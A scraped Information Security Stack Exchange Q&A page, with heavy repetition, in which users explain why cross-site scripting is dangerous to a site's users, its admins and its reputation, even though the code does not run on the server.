answered 21 hours ago
Vipul NairVipul Nair
979
answered 21 hours ago
Vipul NairVipul Nair
979
answered 21 hours ago
Vipul NairVipul Nair
979
979
Not just stored XSS but what if you send a malicious URL to the admin? The same threat applies.
– schroeder♦
17 hours ago
Absolutely.I didnt write it because i only wanted to add what steffen wrote.
– Vipul Nair
8 hours ago
add a comment |
Not just stored XSS but what if you send a malicious URL to the admin? The same threat applies.
– schroeder♦
17 hours ago
Absolutely.I didnt write it because i only wanted to add what steffen wrote.
– Vipul Nair
8 hours ago
Not just stored XSS but what if you send a malicious URL to the admin? The same threat applies.
– schroeder♦
17 hours ago
Not just stored XSS but what if you send a malicious URL to the admin? The same threat applies.
– schroeder♦
17 hours ago
Absolutely.I didnt write it because i only wanted to add what steffen wrote.
– Vipul Nair
8 hours ago
Absolutely.I didnt write it because i only wanted to add what steffen wrote.
– Vipul Nair
8 hours ago
add a comment |
Most of the possible consequences of XSS vulnerabilities affect the user, not your server. So if you don't care about your user getting their accounts on your website compromised or your users seeing content on your website which doesn't come from your server, sure, ignore those vulnerabilities.
But if your users have admin rights, then an XSS vulnerability can easily lead to unintentional admin actions. A classic case of that is a log viewer in your admin area which isn't XSS-proof. Some javascript snippets in your access logs might get executed by your admins and perform administrative actions under their account. This is why you sometimes see javascript snippets in the HTTP headers of the bots which try to hack your website.
answered 11 hours ago
PhilippPhilipp
44.4k7112140
add a comment |
Most of the possible consequences of XSS vulnerabilities affect the user, not your server. So if you don't care about your user getting their accounts on your website compromised or your users seeing content on your website which doesn't come from your server, sure, ignore those vulnerabilities.
But if your users have admin rights, then an XSS vulnerability can easily lead to unintentional admin actions. A classic case of that is a log viewer in your admin area which isn't XSS-proof. Some javascript snippets in your access logs might get executed by your admins and perform administrative actions under their account. This is why you sometimes see javascript snippets in the HTTP headers of the bots which try to hack your website.
answered 11 hours ago
PhilippPhilipp
44.4k7112140
add a comment |
Most of the possible consequences of XSS vulnerabilities affect the user, not your server. So if you don't care about your user getting their accounts on your website compromised or your users seeing content on your website which doesn't come from your server, sure, ignore those vulnerabilities.
But if your users have admin rights, then an XSS vulnerability can easily lead to unintentional admin actions. A classic case of that is a log viewer in your admin area which isn't XSS-proof. Some javascript snippets in your access logs might get executed by your admins and perform administrative actions under their account. This is why you sometimes see javascript snippets in the HTTP headers of the bots which try to hack your website.
answered 11 hours ago
PhilippPhilipp
44.4k7112140
Most of the possible consequences of XSS vulnerabilities affect the user, not your server. So if you don't care about your user getting their accounts on your website compromised or your users seeing content on your website which doesn't come from your server, sure, ignore those vulnerabilities.
But if your users have admin rights, then an XSS vulnerability can easily lead to unintentional admin actions. A classic case of that is a log viewer in your admin area which isn't XSS-proof. Some javascript snippets in your access logs might get executed by your admins and perform administrative actions under their account. This is why you sometimes see javascript snippets in the HTTP headers of the bots which try to hack your website.
answered 11 hours ago
PhilippPhilipp
44.4k7112140
answered 11 hours ago
PhilippPhilipp
44.4k7112140
answered 11 hours ago
PhilippPhilipp
44.4k7112140
answered 11 hours ago
PhilippPhilipp
44.4k7112140
44.4k7112140
add a comment |
add a comment |
An XSS attack is not a danger to the server. It's a danger to the reason you have a server. Not in a technical sense but very much a human one, as any kind of XSS attack originating from your site usually ends with your reputation down the toilet. A few test cases:
- Someone redirects from your site to a fake login page. Now you have a potential mass security breach of user accounts on your site.
- Someone puts a cryptominer on your site. This will make your visitors' machines work overtime and when spotted, makes you look either grossly greedy and/or grossly incompetent as a sysadmin. Neither of which is a good look.
- Someone redirects traffic from your site to a competitor. I shouldn't have to explain why this is bad.
- Someone puts some javascript in there that makes your site unusable or even crash browsers. Again, should be obvious why this is bad.
- Someone puts DDOS code in your site to try take down your site or a third party. If aimed at you, should be obvious why this is bad. If aimed at someone else and your site is deemed culpable, your hosting provider can cut you off if you do not fix your site for breach of contract.
- Someone replaces your ads with their own. If you rely on ad revenue, they're stealing that revenue.
- Someone uses it to snoop on your users. Hel-lo, breach of GDPR.
answered 10 hours ago
520520
36114
add a comment |
An XSS attack is not a danger to the server. It's a danger to the reason you have a server. Not in a technical sense but very much a human one, as any kind of XSS attack originating from your site usually ends with your reputation down the toilet. A few test cases:
- Someone redirects from your site to a fake login page. Now you have a potential mass security breach of user accounts on your site.
- Someone puts a cryptominer on your site. This will make your visitors' machines work overtime and when spotted, makes you look either grossly greedy and/or grossly incompetent as a sysadmin. Neither of which is a good look.
- Someone redirects traffic from your site to a competitor. I shouldn't have to explain why this is bad.
- Someone puts some javascript in there that makes your site unusable or even crash browsers. Again, should be obvious why this is bad.
- Someone puts DDOS code in your site to try take down your site or a third party. If aimed at you, should be obvious why this is bad. If aimed at someone else and your site is deemed culpable, your hosting provider can cut you off if you do not fix your site for breach of contract.
- Someone replaces your ads with their own. If you rely on ad revenue, they're stealing that revenue.
- Someone uses it to snoop on your users. Hel-lo, breach of GDPR.
answered 10 hours ago
520520
36114
add a comment |
An XSS attack is not a danger to the server. It's a danger to the reason you have a server. Not in a technical sense but very much a human one, as any kind of XSS attack originating from your site usually ends with your reputation down the toilet. A few test cases:
- Someone redirects from your site to a fake login page. Now you have a potential mass security breach of user accounts on your site.
- Someone puts a cryptominer on your site. This will make your visitors' machines work overtime and when spotted, makes you look either grossly greedy and/or grossly incompetent as a sysadmin. Neither of which is a good look.
- Someone redirects traffic from your site to a competitor. I shouldn't have to explain why this is bad.
- Someone puts some javascript in there that makes your site unusable or even crash browsers. Again, should be obvious why this is bad.
- Someone puts DDOS code in your site to try take down your site or a third party. If aimed at you, should be obvious why this is bad. If aimed at someone else and your site is deemed culpable, your hosting provider can cut you off if you do not fix your site for breach of contract.
- Someone replaces your ads with their own. If you rely on ad revenue, they're stealing that revenue.
- Someone uses it to snoop on your users. Hel-lo, breach of GDPR.
answered 10 hours ago
520520
36114
An XSS attack is not a danger to the server. It's a danger to the reason you have a server. Not in a technical sense but very much a human one, as any kind of XSS attack originating from your site usually ends with your reputation down the toilet. A few test cases:
- Someone redirects from your site to a fake login page. Now you have a potential mass security breach of user accounts on your site.
- Someone puts a cryptominer on your site. This will make your visitors' machines work overtime and when spotted, makes you look either grossly greedy and/or grossly incompetent as a sysadmin. Neither of which is a good look.
- Someone redirects traffic from your site to a competitor. I shouldn't have to explain why this is bad.
- Someone puts some javascript in there that makes your site unusable or even crash browsers. Again, should be obvious why this is bad.
- Someone puts DDOS code in your site to try take down your site or a third party. If aimed at you, should be obvious why this is bad. If aimed at someone else and your site is deemed culpable, your hosting provider can cut you off if you do not fix your site for breach of contract.
- Someone replaces your ads with their own. If you rely on ad revenue, they're stealing that revenue.
- Someone uses it to snoop on your users. Hel-lo, breach of GDPR.
answered 10 hours ago
520520
36114
answered 10 hours ago
520520
36114
answered 10 hours ago
520520
36114
answered 10 hours ago
520520
36114
36114
add a comment |
add a comment |
It looks like you're looking for danger to the server (including SQL etc.), not the client, so many dangers don't apply.
But there is a danger to the server from what the client is allowed to do on the server. If the client has permission to change the database, so can an attacker. And the same goes for anything a client has permission to do on the server.
answered 18 hours ago
User42User42
1773
Why the downvote? OP said they fail to see the danger because it "does not execute on the server side which contains the databases, and many important files. "
– User42
17 hours ago
add a comment |
It looks like you're looking for danger to the server (including SQL etc.), not the client, so many dangers don't apply.
But there is a danger to the server from what the client is allowed to do on the server. If the client has permission to change the database, so can an attacker. And the same goes for anything a client has permission to do on the server.
answered 18 hours ago
User42User42
1773
Why the downvote? OP said they fail to see the danger because it "does not execute on the server side which contains the databases, and many important files. "
– User42
17 hours ago
add a comment |
It looks like you're looking for danger to the server (including SQL etc.), not the client, so many dangers don't apply.
But there is a danger to the server from what the client is allowed to do on the server. If the client has permission to change the database, so can an attacker. And the same goes for anything a client has permission to do on the server.
answered 18 hours ago
User42User42
1773
It looks like you're looking for danger to the server (including SQL etc.), not the client, so many dangers don't apply.
But there is a danger to the server from what the client is allowed to do on the server. If the client has permission to change the database, so can an attacker. And the same goes for anything a client has permission to do on the server.
answered 18 hours ago
User42User42
1773
edited 17 hours ago
answered 18 hours ago
User42User42
1773
answered 18 hours ago
User42User42
1773
answered 18 hours ago
User42User42
1773
1773
Why the downvote? OP said they fail to see the danger because it "does not execute on the server side which contains the databases, and many important files. "
– User42
17 hours ago
add a comment |
Why the downvote? OP said they fail to see the danger because it "does not execute on the server side which contains the databases, and many important files. "
– User42
17 hours ago
Why the downvote? OP said they fail to see the danger because it "does not execute on the server side which contains the databases, and many important files. "
– User42
17 hours ago
Why the downvote? OP said they fail to see the danger because it "does not execute on the server side which contains the databases, and many important files. "
– User42
17 hours ago
add a comment |
Sai Kumar is a new contributor. Be nice, and check out our Code of Conduct.
Sai Kumar is a new contributor. Be nice, and check out our Code of Conduct.
Sai Kumar is a new contributor. Be nice, and check out our Code of Conduct.
Sai Kumar is a new contributor. Be nice, and check out our Code of Conduct.
Thanks for contributing an answer to Information Security Stack Exchange!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f206520%2fhow-dangerous-is-xss%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
1
It's as dangerous as a friend lying to you on your face about pretty important stuff. In above analogy friend is genuine web application and face is it User Interface.
– user101
20 hours ago
Are you asking about the dangers to the server, then?
– schroeder♦
17 hours ago
2
What you seem to be missing is that it's dangerous to your user more than to your server.
– jpmc26
10 hours ago
@Schroeder I wanted to know why is xss considered dangerous even though it does not do any harm to the server on which the application is hosted on.
– Sai Kumar
10 hours ago
3
But you are aware that it is dangerous to clients, right?
– schroeder♦
9 hours ago